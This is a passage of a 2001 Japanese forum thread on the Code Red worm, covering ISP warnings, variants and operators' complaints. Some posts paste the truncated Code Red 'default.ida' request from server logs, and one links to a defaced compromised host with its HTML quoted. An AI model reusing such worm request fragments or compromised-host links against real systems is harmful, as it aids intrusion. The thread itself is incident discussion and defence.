>>445
プロバイダ側の論理だと、何もわからないユーザに警告しちゃうと
びっくりしてIIS止めちゃうので、「こいつは感染してる」ってわ
かるように、しばらく現場保持させとこうって考えもあるんだぞ。

漏れは賛成できないがな。

447 :名無しさん@お腹いっぱい。:2001/08/21(火) 23:40
>>446
警告すると逆ギレする顧客がウザいから放置してんじゃないかな。

448 : :2001/08/21(火) 23:46
CodeRedで広がる波紋――英損保業者,IISユーザーの保険料を値上げ

英保険ブローカーのJ.S. Wurzlerはこのほど,IISを利用する顧客の保険料を最大15%値上げした。
同社によれば,Microsoft製品はハッカーの被害に遭いやすく,その分,MS製品のユーザーの
保険料を引き上げるのは理に適っているという。



http://www.zdnet.co.jp/zdii/0108/21/hn_001.html

449 :え〜ん:2001/08/22(水) 00:15
いまだに定期的に、サイトチェックしてくれてる方感謝。
そろそろ寝る

450 :え〜ん:2001/08/22(水) 00:16
>>448
最後にこのネタおもしろい
リンク追加

451 :445:2001/08/22(水) 00:31
でもねエコノミーなのよ、うち・・・ま、それは良いとして
専用線で鯖立ててる奴も多かろうに、と思った次第す

452 :Code赤過ぎ:2001/08/22(水) 04:22
某NG系でみたんだけど、ダミーでIISたててパッチ済みにしてネットに
繋ぐ。チェッカーで感染警報。なんで?ってのがあった。
パッチ不可能のモデルが来てるの?Logには今までと同じのしか飛んできてない
らしい。root.exe等作らないやつ。
詳細キボン。 鬱だね、IIS

453 :名無しさん@お腹いっぱい。:2001/08/22(水) 04:29
チェッカーが馬鹿で誤検出する、というのが過去ログに
あったような気がする。

454 :名無しさん@お腹いっぱい。:2001/08/22(水) 08:00
どうでもいいからシマンテック、TrendMicroその他ウイルス対策会社はIISをウイルスとして扱え

455 :名無しさん@お腹いっぱい。:2001/08/22(水) 14:30
>>451
ウチの会社はスーパー引いてるけど、ウチも昨日だったよ。メール

456 :455:2001/08/22(水) 14:32
以下全文

OCNサービスご利用のお客様へ
                 2001年8月21日
                 NTTコミュニケーションズ(株)
                 OCNサービスセンタ


       「Code Redワーム」にご注意下さい


---------------------------------------------------------------
・緊急かつ重要な案件のため、通常OCNからの電子メールによるご案内
 を不要とされるお客様にも送信しております。
・全てのお客様にお知らせしている都合上、本メールの内容について、
 対策不要な環境でインターネットをご利用のお客様にもお送りして
 おります。お客様のご利用環境が対象なるかご確認下さい。
---------------------------------------------------------------


 日頃はOCNサービスをご利用いただきまして、誠にありがとうござい
ます。
 さて、既にマスコミの報道等によりご存知の方もいらっしゃるかと
思いますが、マイクロソフト社 Windows NT/2000 等のオペレーティン
グシステム製品に感染する「Code Red」と呼ばれるワーム型コンピュー
タウィルスとその変種が世界中で猛威を振るっており、OCN でも多くの
お客様ににその被害が広まっています。

 マイクロソフト社のInternet Information Services(以下、IIS)及び
Index Server/Serviceを搭載するWindowsNT/2000等のオペレーティング
システム製品は、IISを実際にご利用になっていない場合でもCode Red
に感染する可能性があります。

 感染すると他のIISサーバを攻撃すると共に、自分自身にはインター
ネットから不正侵入することができるバックドア(ハッカーがしのびこ
むための裏口)をサーバに仕掛けるため、早急な対策を強くお勧めしま
す。

具体的な対策はマイクロソフト社等のホームページをご覧下さい。

457 :455:2001/08/22(水) 14:33
つづき

===============================================================
Code Red による深刻な問題に対する防護策と対処方法についての説明
---------------------------------------------------------------
http://www.microsoft.com/japan/technet/security/codeptch.asp
※このホームページにはWindows NT 4.0/Small Business Server 4.5
 Windows 2000/Small Business Server 2000の具体的な対策方法が
 紹介されています。

===============================================================
Windows 2000 Professional 用 Code Red ワーム対策ガイド
---------------------------------------------------------------
http://www.microsoft.com/japan/technet/security/codestep.asp
※このホームページにはWindows 2000 Professionalの具体的な対策方
 法が紹介されています。

===============================================================
Code Red II ワームの既知の影響を排除するツール
---------------------------------------------------------------
http://www.microsoft.com/japan/technet/security/redfix.asp
※このホームページにはCode Red IIが仕掛けるバックドアの修復ツー
 ルが紹介されています。最近はCode Red IIの感染報告が増加してい
 ますので、是非確認されることを強くお勧めします。

 上記ホームページの内容をご確認頂いた後、内容にご不明な点があ
れば下記マイクロソフト社様専用窓口にお問い合わせ下さい。

・マイクロソフト IIS セキュリティ情報センター
 TEL:0120-69-0196
 営業時間:9:00〜21:00まで有人対応(平日、土日祝日)
      21:00〜翌9:00まで自動応答

===============================================================
Code Red チェックツール
---------------------------------------------------------------
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3057

※このホームページにはCode Redが利用するセキュリティホールの
 有無を確認できるツールが紹介されています。

 また、OCNホームページ「サポートからのお知らせ」にはCode Red に
よって影響を受けるダイヤルアップルータ等の情報も記載しております
のでご参考になさって下さい。

Code Red ワームに関する情報
http://www.ocn.ne.jp/announce/2001/0803.html

※既に対処済みの場合には、入れ違いのご連絡となりましたことをお詫
 び申し上げます。

 なお、本件に関してましてご不明な点がございましたら、下記の窓口
までお問い合わせ下さい。

458 :名無しさん@お腹いっぱい。:2001/08/22(水) 15:44
日本ビジネスコンピューターから赤虫きたんだけど、
http://www.jbcc.co.jp/information/idc_index.htm
これって大丈夫かよ(w

459 :名無しさん@お腹いっぱい。:2001/08/22(水) 16:19
>>458
ガンバって将来のユーザーを増やしてるんだろ?

460 :名無しさん@お腹いっぱい。:2001/08/22(水) 16:28
IISで単純に長いURLをRejectするモジュールが出たみたいね。

461 :名無しさん@お腹いっぱい。:2001/08/22(水) 17:26
>>445 >>455
私はOCNのダイアルアップユーザーですが、20日の朝に届いたよ。

462 :455:2001/08/22(水) 20:18
>>461
ダイアルアップでも感染するからね。
問題なのは「エコノミー」以上の専用線ユーザ(ほとんどサーバ立ててると思われる)
への通知が今ごろだったって事。
OCNはサーバ用OSにNT推奨してるんだよね。
なのにIISのセキュリティホールの勧告なんて、今まで一回も無かった。
こういう情報は、専用線接続の全ユーザにきっちり流すべきだと思う。

463 :名無しさん@お腹いっぱい。:2001/08/22(水) 20:26
>>445
今さらって思ってはいるよ。

いろいろあるんだよO○N内でもさ
7月の後半に注意喚起しようとしても
GOサインが出なかったんだよ。

464 :名無しさん@お腹いっぱい。:2001/08/22(水) 20:28
>>463
あのセキュリティホールって6月だったような・・・

465 :名無しさん@お腹いっぱい。:2001/08/22(水) 20:34
そろそろ、サポートセンターの方々の愚痴が聞きたいナ

466 :463:2001/08/22(水) 20:39
>>464
MSのネタではね。
実際に感染を確認したのは7/19,20だけど、絶対数が足りなかった。

実際に何か大規模に起きないと動かない人達なので、事が発生して
それなりの申告(内外の)があって初めて検討するからね。
権限あるところに、判る人がいないのが今回の時期はずれメールの原因

あと、Webサーバに関しては客側に全責任がある。
サポートは一切しないはずです。パッケージ契約でなければ。

>>465
どのようなこと?

467 :461:2001/08/23(木) 00:38
>>462
激しく同意。
私もあのメールが来たときには、やっと来たか・・・ってオモタYO。
現に専用線からのアタックも多かったし、ダイアルアップからもひっきりなしに
アタックがあったし・・・
最低でも専用線ユーザーには早い段階で通知して欲しいと思ふ。

かくいう私もダイアルアップで感染したし、赤虫も2ちゃんで初めて知った厨房。
(その後再インスト IIS未インスト+SP2+パッチで対策済み)

鬱だ市んでくる・・・

468 :名無しさん@お腹いっぱい。:2001/08/23(木) 01:16
あんま早いのもちょっとね。
掲示板の情報パクって検証もせずに通知してんじゃねーだろーとか勘ぐっちまう

469 :名無しさん@お腹いっぱい。:2001/08/23(木) 01:26
ばかたれども。
なんでプロバが馬鹿ユーザが立てた鯖の心配しなきゃいかんのだ。
NT推奨だと?お前らにUNIX推奨しても使いこなせねえで変な質問ばっか
よこすからしかたなくNTにしとけって意味なんだよ。けっ。
なんか勘違いしてんじゃねえか?

470 :名無しさん@お腹いっぱい。:2001/08/23(木) 01:57
>>469

>なんでプロバが馬鹿ユーザが立てた鯖の心配しなきゃいかんのだ。
東京めたりっくみたいになるからだろ?

471 :名無しさん@お腹いっぱい。:2001/08/23(木) 02:01
>>469

>NT推奨だと?お前らにUNIX推奨しても使いこなせねえで変な質問ばっか
>よこすからしかたなくNTにしとけって意味なんだよ。けっ。

だから、UNIXも扱えんアホばかりだからIISのセキュリティホールの勧告を出しとけってことでしょ

472 :名無しさん@お腹いっぱい。:2001/08/23(木) 02:21
拡張子が.aspってマカフィってIIS使ってるんすかね?
別に何使おうが勝手なんですけどね
セキュリティを扱う会社にしては珍しいんじゃないかなーっと

473 :名無しさん@お腹いっぱい。:2001/08/23(木) 02:25
え?.aspって全部IISなの?
知らんかったわ。

474 :472:2001/08/23(木) 02:32
なんかトップページ以外はほぼ全部asp。
経営母体のネットワークアソシエイツも同じ構成みたい。

475 :名無しさん@お腹いっぱい。:2001/08/23(木) 02:46
http://www.nai.com/
ここのwebサーバーのレスポンスメッセージのヘッダー

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 22 Aug 2001 17:42:59 GMT
Connection: Keep-Alive
Content-Length: 38183
Content-Type: text/html
Cache-control: private

やっぱりIISだね

476 :んー:2001/08/23(木) 04:32
厨房には解らんかもしれんが、
コスト削減が主流の、現代の企業にとって
セキュリティに問題があっても
NTは、必要なのだよ。
Sunは、ハード&サポートの面で、きついのだよ。

477 :名無しさん@お腹いっぱい。:2001/08/23(木) 06:23
コスト削減の為にNT?

478 : :2001/08/23(木) 06:47
ちなみに、Linux、FreeBSDは、サポートが駄目駄目なので
基本的には、却下だな。
やっぱ、サポート料払って、責任丸投げできなきゃ
使わん。

479 :名無しさん@お腹いっぱい。:2001/08/23(木) 07:44
逆に今回みたいにセキュリティに問題があったため損害を被ったときのコストは計算に入れてないのね。


しかもwebサーバーの6割がサポートなしのapacheを使ってる。サポートがなきゃダメなんじゃないの?

480 :名無しさん@お腹いっぱい。:2001/08/23(木) 08:32
>>479
被害があっても、金銭的に莫大な被害が無いかぎり問題ないのじゃよー。
信用を失う事も3万件の顧客情報が漏れてもへっちゃらな日本にはさほど問題じゃないのじゃよー。
被害者面でおきらくごくらくーぅ。

481 :名無しさん@お腹いっぱい。:2001/08/23(木) 08:57
NT vs 他のOS議論はお腹いっぱいだからよそうよ。
なんか新しい動きがあったみたいだね。
http://memo.st.ryukoku.ac.jp/archive/200108.month/1078.html
ってのがセキュリティホール memoで紹介されていた。

482 :某ISP:2001/08/23(木) 10:29
>>398
来ちゃったよ。Apache::CodeRed の自動応答が(藁。
お馬鹿なダイヤルアップユーザは減らないなぁ。ちゃんと周知はしてるんだけど。

From: postmaster@xxxxxxxx.net
Message-Id: <200108221706.f7MH5qc25868@xxxx.xxxxxxxx.net>
Mime-version: 1.0
Date: Wed, 22 Aug 2001 14:05 -0300
Subject: CodeRed infection on 'xxxxxxxx.xxxx.ne.jp.': Automatic report
To: webmaster@xxxx.ne.jp, postmaster@xxxx.ne.jp,
administrator@xxxx.ne.jp, abuse@xxxx.ne.jp
Content-transfer-encoding: 8bit
Cc: dbailey@xxxxxxxx.ca
Content-Type: text/plain; charset="iso-8859-1"


Your Microsoft IIS server (at 123.45.67.89) appears to have been
infected with a strain of the CodeRed worm. It attempted to spread to
our Web server, despite the fact that we run Linux and Apache (which
are immune).

You should immediately download the security patch from Microsoft, from
<http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/topics/codealrt.asp>.

123.45.67.89 Wed Aug 22 14:04:42 2001 adt

Brought to you by Apache::CodeRed 1.07 for mod_perl and Apache,
written by Reuven M. Lerner (<reuven@lerner.co.il> and running on
'xxxx.xxxxxxxx.net'.



Automatically generated by Apache::CodeRed 1.07 for mod_perl and
Apache, written by Reuven M. Lerner (<reuven@lerner.co.il> and
running on 'xxxx.xxxxxxxx.net'.

483 :>479:2001/08/23(木) 11:24
Apacheが、Solaris上で動いてれば
Sunのサーバーの保守の範囲に含まれるのだよ。
厳密に言えば、Apacheのアップグレードとかに
対するメンテナンス費用ってのは、ないかもしれんが。

484 :名無しさん@お腹いっぱい。:2001/08/23(木) 20:22
>対するメンテナンス費用ってのは、ないかもしれんが。

じゃぁサポートしてないじゃん

485 :名無しさん@お腹いっぱい。:2001/08/23(木) 20:26
昨日の朝から変種が来てますなあ。
先頭あたりの「CodeRedII」→「_________」
あと送信先IPが少し違う。

486 :名無しさん@お腹いっぱい。:2001/08/23(木) 20:39
いいなあ、ウチにはまだ来ないよ。
はやくこないかなあ。

487 :ゴルァ!:2001/08/23(木) 20:57
http://www.security.nl/misc/codered-stats/
おちてねー?

488 :名無しさん@お腹いっぱい。:2001/08/23(木) 23:10
>>487
遅いけど落ちてないよ。>今は

489 :名無しさん@お腹いっぱい。:2001/08/24(金) 00:21
>>466

>あと、Webサーバに関しては客側に全責任がある。
>サポートは一切しないはずです。パッケージ契約でなければ。

感染した奴にそう言ってしかるべきだが、野放しになっているアホユーザからいっぱい
要らんパケット貰って迷惑してる他ユーザとしては、ユーザ同士でかってにやれとい
わんばかりに知らん顔決め込まれたのは相当に不信に思ったのだった。

ユーザですら努力しているのだから、正直、プロバイダ同士で協力しあって安全で使い
やすいインフラにする努力はしてほしいところ。

490 :名無しさん@お腹いっぱい。:2001/08/24(金) 00:48
やぷーが感染してるかにゃ〜?(w

491 :466:2001/08/24(金) 00:59
>>489
おっしゃることは分かりますが、代価を頂いてはじめて
サポート対象となることはご理解頂きたいです。

申告をいただければ、対象者に連絡はしていますが
踏み込んだ対応(利用停止等)を行っていないのも事実です。
→CodeRedに関しては

CodeRedの場合、規制すればWebの閲覧不可になるわけだし、
送受信されるパケットを許可無しに閲覧、規制することは
法律に触れますので...

「プロバイダ同士で協力しあって」は正直難しいです。
しかし「使いやすいインフラにする努力」は当然思慮すべきことですね。

492 :名無しさん@お腹いっぱい。:2001/08/24(金) 01:06
急にサポセン口調になったな

493 :名無しさん@お腹いっぱい。:2001/08/24(金) 02:06
業務上の社会的義務とかいったものもあるはずだよね。
廃液垂れ流しの工場なんかは規制されてしかるべしだし。

494 :名無しさん@お腹いっぱい。:2001/08/24(金) 07:22
>>480

なるほど
信用落として売上げ落としてもお気楽なのね
技術盗まれてライバルに抜かれて無駄な開発費かけてもお気楽なのね
被害があっても金銭的に多少の被害ならお気楽なのね
被害者面して訴えられて裁判費用かかってもお気楽なのね


金かかってんじゃねーかよ。
コスト削減の意味ねー

495 :名無しさん@お腹いっぱい。 :2001/08/24(金) 08:32
>>491
ワームを垂れ流しているサーバーの通信を制限しても法律に触れるのか?
制限しない方がまずそうだけど。

496 :名無しさん@お腹いっぱい。 :2001/08/24(金) 08:34
>>476
これだけセキュリティーで問題が出ても、ちゃんと管理出来てると言えるの?
サポート費用だけ取られていない?

497 :489:2001/08/24(金) 08:49
>>491
わたしのレスも型どおりっぽいのですが、ユーザの立場として思うのはこういうこと。
べつにここでサポートしてくれとか言うわけではないけど、プロバはほんとになんに
もできないのか、考えて欲しい。
当然、素人考えで勝手な部分もあるから割り引いて読んで(藁

・ユーザが対価として期待している通信の質・安全性が保たれているだろうか。
現状ではVPNサービスのように閉じた網サービスを除いては、安全さ、防疫といった
部分は必ずしも契約に含まれていないのは確か。
ただし安心を差別化要素とか、プロバ自身の信用の要素として捉えているのかどう
だろうか企業姿勢というか、業界全体の姿勢が、逃げているように感じられてしまう。
某コイズミではないが、改善改革に頭を使っているかどうかユーザには見えてこない
ように思う。
技術者でもないフツーの人がユーザになっている今では、セキュリティの問題、ユー
ザが許容・対処できるもの(アカウント管理)もあるが、防疫対策は素人の対処できる
範囲を越えてきた気がする。メールについてはプロバが防疫サービスを行うようになっ
てきた。お金はかかるが技術的な負担も軽くて対価に見合うと思っている。

・法律、業界の協力の問題
プロバイダに権限と同時に義務を持たせるように法律を変えるか、品質に対して業界
で自己評価基準でも設けてはいかがと思う。当然それは個々のプロバイダでは無理
で業界として取り組まないと。技術も運用も理解しない政治家がとんちんかんな法律
をつくりかねない。ユーザやプロバイダが主導で法律を起こしたほうがユーザとしては
受け入れやすい。
当然、法律等の整備がなされていない段階で今回のCodeRedにすぐ対処しろという
ことを主張したいわけではなくて、毎回、嵐が去るのを首をちぢこめて待っているだ
けのように見えるのが残念。いやそんなことはないというのを、今見せろといわないけど
いつか見せて欲しい。

ところで、
>> CodeRedの場合、規制すればWebの閲覧不可になるわけだし、
あきらかにユーザとしての契約上の義務に違反していて、警告して一定期間内に対処
されなければ、ぶったぎられて当然と思いますが、そんなに難しいのでしょうか。
単に、手間ヒマや逆切れユーザの対処がプロバに対して負担だから言い訳になって
しまっているように感じます。実態は法律よりコストや体制・パワーの問題ではないで
すか?
たとえば、マンションの管理者は、もちろん法律で許可された範囲の手段ながら、迷惑
な住人から近隣住民の利益を守る義務を負っていますし、実際にたいていの管理者は
注意くらいはしてるわけですよね。

498 :名無しさん@お腹いっぱい。:2001/08/24(金) 11:18
>CodeRedの場合、規制すればWebの閲覧不可になるわけだし、

馬鹿? それともOCNには上りと下りを別々に規制できる技術者も
いないのか?

>送受信されるパケットを許可無しに閲覧、規制することは
>法律に触れますので...

東めたはポート80閉じましたが何か?

499 :名無しさん@お腹いっぱい。:2001/08/24(金) 14:19
>>494
クラックされたからって信用が落ちて売り上げ落ちた所なんてあるぅ?
クラックされて情報漏洩で裁判費用でヒィヒィなんて所あるのぉ?
ないよねー。ないよー。
ぜんぜん、問題ないよー。
ニッポンジンイイヒトバカリ。ボクスキ、ボクスキ、ニッポンダイスキ。

500 :名無しさん@お腹いっぱい。:2001/08/24(金) 17:55
500

501 :名無しさん@お腹いっぱい。:2001/08/24(金) 20:12
>>499
クラックされるような会社にクレジット番号は送信したくないな。

502 :名無しさん@お腹いっぱい。:2001/08/24(金) 20:39
>>499

とりあえずバックドア仕掛けられまくってる韓国とは取り引きしたくないな

503 :名無しさん@お腹いっぱい。:2001/08/24(金) 21:51
memoからパチり。
http://www.hotwired.co.jp/news/news/20010824301.html

504 :491:2001/08/24(金) 22:10
>>497
逃げの姿勢ですか、確かに収益性の無いものからは避けますよね。
でもこれから安全や安心もISPのサービスの一環となるでしょうから
企業努力の見せ所ですね。

「ぶったぎられて当然」は個人的にはそう思います。
SPAM等に関しては時間がかかりましたが規約改正等で厳しい
対応が可能となりましたが、CodeRedのように流行りものの
ようなものには対応しきれていないのが現実です。
約款や規約改正は簡単には行えないのです。
(言っていて情けないが)

>実態は法律よりコストや体制・パワーの問題ではないですか?
その通りです(苦笑)詳しくはコメントできませんが...

>>498
私個人はヴァカですが、周りの人達はそうではないですよ。
技術的には当然可能ですが、現行の規約ではCodeRedで
利用停止にはできませんので、仮に特定のポート止める
にしてもフィルタ設定と対応パターンを全ての設備に
導入するのは、コスト面と人的面で不可能だし...

その点、東めたさんはすごいと思いますよ。
止めちゃったんだから...

うちの設備がユーザから出るCodeRedパケットで
パンクするようなら止めちゃったかもしれませんけどね。

ttp://www.meti.go.jp/meti_hou/body/00000229.html

そろそろヤバソなので自粛します。

505 :名無しさん@お腹いっぱい。:2001/08/24(金) 22:29
また変種が来てるようですな。
ご丁寧に裏口が塞がれてる模様。
MSが流したのかな?w

506 :怖くなった:2001/08/25(土) 00:17
1週間前にメールで警告したサイトの管理者より、携帯へ御礼の伝言が入っていた。
おらぁ番号知らせた覚えは無いぞ。有る意味ゾッとした。気持ち悪いんで関わりたくない、ほっておこう。

507 :名無しさん@お腹いっぱい。:2001/08/25(土) 00:58
それはすごいな、どうやって調べたんだろう。
つーか、会社にTELで問い合わせしたのかも。

508 :名無しさん@お腹いっぱい。:2001/08/25(土) 04:03
>>499

あのぉサポート料って「裁判費用でヒィヒィ」ってほど高くないと思いますよ

509 :名無しさん@お腹いっぱい。:2001/08/25(土) 17:34
Code Red IIの変種「CodeRed.d」が出現
http://www.zdnet.co.jp/news/0108/25/b_0824_08.html

510 :名無しさん@お腹いっぱい。:2001/08/25(土) 17:38
↑って上の方ででてるcoderedIIの部分を_____にしてある奴の
事だね。ログからじゃ判別できないな。

511 :名無しさん@お腹いっぱい。:2001/08/26 06:21
>>509
永遠に続くかもしれないだって。
イヤになっちゃうねぇ。

512 :名無しさん@お腹いっぱい。:2001/08/26 08:43
>509
この変種って、同じところから何度もアタックしてるやつだと思って
いいんでしょうか?、、
とすると、前のはIPの近い所からが多かったですけど、今度のは、
202.160.29.180から24回 24.178.213.75から39回
213.93.157.39から80回 212.114.170.252から78回
66.90.139.148から51回 202.65.200.43から42回
って感じで世界各地からの攻撃ですよね?、、
これだと以前の奴よりトラフィックに与えるダメージ大きくないですか?、、
誰かやるかもって思ってたけど、、はぁ、、

513 : :01/08/26 11:56
>509
9月末までのタイマーは外されたのだろうか?

514 :名無しさん@お腹いっぱい。:01/08/26 12:32
>>513
どうなんだろ。ディスアセ見るとたぶん2バイト書き換えただけで無効にできるけど。

515 : :01/08/26 15:42
今日、Apache入れていろいろ設定して127.0.0.1で接続確認。
で、ちゃんとログとれてるか確認してみたら…
第一アクセスが、"GET /default.ida?XXXXXXXXXXXXX・・・

鬱。

516 :名無しさん@お腹いっぱい。:01/08/26 17:32
なんちゃってIISユーザーの次は、
なんちゃってApacheユーザーの増加ですか・・・

クラックされんなヨ

517 :erer:01/08/27 22:23 ID:w8fjr5p2
test

518 :名無しさん@お腹いっぱい。:01/08/27 22:42 ID:fiQ7.woQ
interqが多い。。。。
"GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX

インターq経由

519 :名無しさん@お腹いっぱい。:01/08/28 00:23 ID:FWrmUw3Y
http://www.microsoft.com/security/mpsa/
これいいね。

520 :名無しさん@お腹いっぱい。:01/08/28 00:29 ID:RMa3gYJM
マ小手先のイクロソフト逝ってよし。

521 :名無しさん@お腹いっぱい。 :01/08/28 09:52 ID:1g05Vkzg
Code Redってドリンクの名前だったって、既出ですか?
マウンテンデューの赤いやつなんですって。
でもって今それバカ売れなんですって。

「7月にカリフォルニアのプログラマー2人が新しいウィルスを
 発見した。2人はこのウィルスをそのとき飲んでいたソーダに
 ちなんで『コード・レッド』と名づけた」

ソース
ttp://www.adage.com/news_and_features/features/20010827/article2.html

522 :名無しさん@お腹いっぱい。:01/08/28 13:13 ID:e.1hfgHY
うん、とっても既出。

523 :名無しさん@お腹いっぱい。:01/08/28 14:58 ID:aX.UQXNA
明日からコードレッドは休みに入ります。
新学期からまた復活するが(W

524 :名無しさん@お腹いっぱい。:01/08/28 16:28 ID:8LMw7wSw
>>523
8/30じゃなくて9/30だYO!

525 :test:01/08/28 17:36 ID:5Ko4uT/A
"永遠の命を持った『Code Red』ワーム "だってさ!

ttp://japan.cnet.com/News/2001/Item/010828-3.html

526 :名無しさん@お腹いっぱい。:01/08/28 17:44 ID:e.1hfgHY
それ、上の方でも紹介されてたような気がするけど、
日付チェックの部分には触れられてないよね。
なんか、事実誤認なのかな。

527 :名無しさん@お腹いっぱい。:01/08/28 22:25 ID:BtAsF0xc
CodeRedProveがバージョンアップしてたよ。
CodeRed.dも検知出来るようになったみたい。

うーん、.dの方も結構来るね・・・

528 :名無しさん@お腹いっぱい。:01/08/28 23:59 ID:TGozUppA
>>523
それはCODE RED 1のことだよ

>>526
525はCODE RED 3のことだよ。CODE RED 2じゃないよ

529 :名無しさん@お腹いっぱい。:01/08/29 00:46 ID:k9FutbP2
XPはデフォルトでPFWついてるらしいが、IIS立ててても感染しないのかな?

530 :名無しさん@お腹いっぱい。:01/08/29 03:02 ID:5NCTEWBg
>>528
いや、だから、そのcode red3だかcodered.dだかは日付チェックが
 はずしてあるのかな?というのが疑問なんだがなあ。

531 :名無しさん@お腹いっぱい。:01/08/29 04:43 ID:WLiF7O.E
あのー
おとりこみちゅーすみません。
これ−> ttp://www.security.nl/misc/codered-stats/
のイジョーな増え方って何かのバグですよね?きっと?

532 :名無しさん@お腹いっぱい。:01/08/29 06:42 ID:J5fWh8XU
>>531
以前も突然最後が振り切ったことがあるけど、横軸が長くなると右端がバグっている
ように思われる。前回は1〜2日たったら治ったけど。

533 :名無しさん@お腹いっぱい。:01/08/29 14:32 ID:zSlES5xk
http://www.icnet.ne.jp/codered.htm
がいしゅつだったら申し訳ない

534 :名無しさん@お腹いっぱい。:01/08/29 17:04 ID:ZUMagcrA
>>533
よくわからんな・・
planexのBRL-01はNATルータだろ。
Code RedはWindows用のコード。
それが感染するのならBRL-01はWindowsで動いてることになるが、
そんな高くて信頼性の低い仕様を採用することはあり得ないぞ(w

535 :被害報告:01/08/29 19:27 ID:9Fs6gf7c
10〜20分に1回アタック食らうんだけど、これって正常?

536 :名無しさん@お腹いっぱい。:01/08/29 19:31 ID:FfdqxhyU
>>534
客先にBRL-01が有りました。CodeRedで逝きました。
現象としては、WAN側のDHCPが無効になって固定IPになったりNATが無効になったりと、
パラメータがめちゃくちゃになります。
おそらくは、バッファオーバーランでパラメータ管理領域を上書きしてしまっているのだと思われ。
当然、CodeRedのコードが走るわけではありませぬ。

537 :名無しさん@お腹いっぱい。:01/08/29 21:03 ID:ZUMagcrA
>>536
それならわかるぞ。
Code Redで障害を起こすルータにBRL-01が加わっただけのこと。

>*現在CodeRedに感染されているユーザには個別にご連絡しております。
> 弊社よりご連絡のない方でも今後感染し、上記ルータがCodeRedの
> 発信元となる恐れがあります。
> CodeRed対策をされるまでは利用されないようお願いいたします。

つーicnetの情報は間違いだ。

538 :名無しさん@お腹いっぱい。:01/08/29 21:08 ID:ZUMagcrA
>>535 極普通かやや少な目。

539 :ななし:01/08/29 21:30 ID:rPf/LY52
IISは使ってないんですけど
/default.idaを作って遊べないんですか?

540 :名無しさん@お腹いっぱい。:01/08/30 02:07 ID:dVQuQv0.
>>537
なにげに書き変わってるぞ。icnet

541 :なんだこれ?:01/08/30 07:30 ID:yNozpN4A
http://210.108.138.125/

542 :TEST:01/08/30 12:44 ID:RJYzaYaw
>>541
sadmind. sadmindにやられているマシンってCodeRedにも
 やられてるね。

543 :名無しさん@お腹いっぱい。:01/08/30 13:26 ID:RwQIWvuM
戚 凪戚走研 達聖 呪 蒸柔艦陥.
達壱 赤澗 凪戚走亜 肢薦鞠醸暗蟹 戚硯戚 痕井鞠醸暗蟹 析獣旋生稽 紫遂拝 呪 蒸柔艦陥.

--------------------------------------------------------------------------------

陥製聖 獣亀背 左淑獣神.

爽社 妊獣匝拭 凪戚走 爽社研 脊径梅陥檎 爽社研 舛溌備 脊径梅澗走 溌昔背 左淑獣神.

210.108.138.125 幡 凪戚走研 尻 陥製 据馬澗 舛左拭 企廃 元滴研 達生淑獣神.
及稽 舘蓄研 適遣馬食 陥献 元滴研 獣亀背 左淑獣神.
HTTP 404 - 督析聖 達聖 呪 蒸製
Internet Information Services


--------------------------------------------------------------------------------

奄綬 舛左(走据 昔径遂)

切室廃 舛左:
Microsoft 奄綬 走据

544 :541:01/08/30 14:04 ID:Mlpm7..2
>>542
sadmind だったのね、初めて見た(^^;教えてくれてありがとェ(_ _)ェ
昨日から、アタックされてたから、何だろうと思って・・・
>>543
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Content-Location: http://210.108.138.125/Default.htm
Date: Thu, 30 Aug 2001 05:02:19 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 24 Jul 2001 20:19:22 GMT
ETag: "01d6ec7d14c11:2020"
Content-Length: 289

<html><body bgcolor=black><br><br><br><br><br><br><table width=100%>
<td><p align="center"><font size=7 color=red>fuck USA Government</font>
<tr><td><p align="center"><font size=7 color=red>fuck PoizonBOx
<tr><td><p align="center"><font size=4 color=red>contact:sysadmcn@yahoo.com.cn</html>

未だにこれなんだけど、見れない?

545 :名無しのFW:01/08/30 15:20 ID:cMYY/OsY
>>541
ノートン騒いでコンテンツロック掛かったゾ。そこ。
ワラタけど

546 :541:01/08/30 15:53 ID:6z/N.MiA
>>545
えっ!、そうなの?、なんか変なところを書き込んだようで ェ(_ _)ェ
ノートン持ってないんで、確認できないけど、
アクセスログも、ソースも、怪しいところがないし
なんでだろ?。

547 :名無しのFW :01/08/30 17:16 ID:5maIehCQ
ソースはオレも見たけど変なの無し。
直後からヤフページャ落ちたりエクセル表示変になったりだったけど、
原因解らず。
因果関係が解らなくて今一すっきりしない。欲求不まーん(w

548 :541:01/08/30 20:38 ID:.BsSBLZk
>>547
ん〜、ゴメンねー、俺がいかがわしいアドレス書いたが為に(^^;
パケットレベルで見ればなんか解るかもしれないけど・・・
Win2kの穴塞いで、糞ルーター取っ払ってネットに直つなぎする
元気ないですェ(_ _)ェ

しかし、CodeRed からのアクセスは気分が悪い・・・

549 :名無しさん@お腹いっぱい。:01/08/30 23:33 ID:hS5hCpys
うちのノートン君静かだったYO!
ソースみたけどスクリプト入ってないし。
HTML書き換えられただけとおもわれ。

550 :549:01/08/30 23:35 ID:hS5hCpys
追加 うちのノートン君はNIS2001の最新版だよー

551 :名無しさん@お腹いっぱい。:01/08/31 11:24 ID:ck8Wbtro
会社で>>541見たら、NAV コーポレートエディション君のスキャンが入って
「Backdoor.Sadmindが見つかったけど検疫で止めたから安心したまえ」的な
コメントが出た。
その後は何もトラブルは起きてないよ。

552 :名無しさん@お腹いっぱい。:01/08/31 16:58 ID:ff3FJU46
sadmindにやられたページ見ても危険があるとは思えないから、
騒ぐソフトの方が変なのではないかなあとか思う。

553 :え〜ん:01/08/31 22:08 ID:ezb9W/X6
今日はオークションとタイタニックかよ。

ところでcodered dってガセではないの?
サイトにリンクしていいのかどうなのか?
仕事が忙しくて調べる暇が無いスマソsage

554 :え〜ん ◆IfHjzAm. :01/08/31 22:14 ID:ezb9W/X6
どうせこて班だからキャップテスト
よごしてすまそ

555 :え〜ん ◆IfHjzAm. :01/09/01 09:12 ID:JQN2L5.o
